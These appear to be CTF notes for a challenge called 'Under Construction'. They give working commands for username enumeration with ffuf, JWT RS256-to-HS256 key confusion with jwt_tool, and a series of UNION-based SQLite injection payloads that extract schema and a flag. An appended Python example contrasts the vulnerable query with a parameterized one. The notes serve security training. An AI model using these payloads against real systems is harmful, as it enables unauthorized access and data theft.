Under Construction
ffuf -request req -w ../../usernames.txt -mr exists -u http://209.97.132.64:32647/auth -s
Usernames:
gale
rosie
• Key Confusion [RS256 > HS256]
./jwt_tool.py -t http://209.97.132.64:32365/ -rc "session=[jwt]" -X k -pk ../../challenges/uc/pk -v
• sqlite_version()
<> -I -pc username -pv "test123' union select 1,sqlite_version(),3 -- "
• table name
-I -pc username -pv "test123' union select 1,(select tbl_name from sqlite_master limit 0,1),3 -- "
• column names [the CREATE TABLE statement returned in the output shows the column names]
-I -pc username -pv "test123' union select 1,(select sql from sqlite_master limit 0,1),3 -- "
• flag
-I -pc username -pv "test123' union select 1,(select <column-name> from <tname> limit 0,1),3 -- "
-------------------------------------------------
observations:
-------------------------------------------------
• JWT public key is present in the JWT token
• Enumerate usernames
• JWT key confusion due to the server accepting both RS256 and HS256
• SQLi is present in the getUser request because the input is not escaped
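Added example (not part of the original notes): the getUser lookup rebuilt in Python's stdlib sqlite3 against a constructed three-column users table, so the page's UNION payload returns sqlite_version() from the string-concatenated query and nothing from the parameterized one. The table name, column names and sample rows are assumptions.

```python
import sqlite3

# Constructed sample schema: three columns, so the page's
# "union select 1, X, 3" lines up with the original SELECT.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "gale", "user"), (2, "rosie", "admin")])
    return con

def get_user_vulnerable(con, username):
    # String concatenation: the quote in the input closes the literal and the
    # rest of the value is parsed as SQL, which is what the UNION payload relies on.
    query = f"SELECT id, username, role FROM users WHERE username = '{username}'"
    return con.execute(query).fetchall()

def get_user_safe(con, username):
    # Parameter binding: the value travels separately from the statement text,
    # so the quote, UNION and comment marker are just characters in a string.
    query = "SELECT id, username, role FROM users WHERE username = ?"
    return con.execute(query, (username,)).fetchall()

# The sqlite_version() payload from the notes above.
PAYLOAD = "test123' union select 1,sqlite_version(),3 -- "

def demo():
    con = make_db()
    leaked = get_user_vulnerable(con, PAYLOAD)  # one injected row
    safe = get_user_safe(con, PAYLOAD)          # no user by that name
    return leaked, safe

def payload_leaks_version():
    # True when the vulnerable path returned the library version in the
    # username column, i.e. the injected SELECT ran.
    leaked, _ = demo()
    return len(leaked) == 1 and leaked[0][1] == sqlite3.sqlite_version

if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)
    print("parameterized:", safe)
```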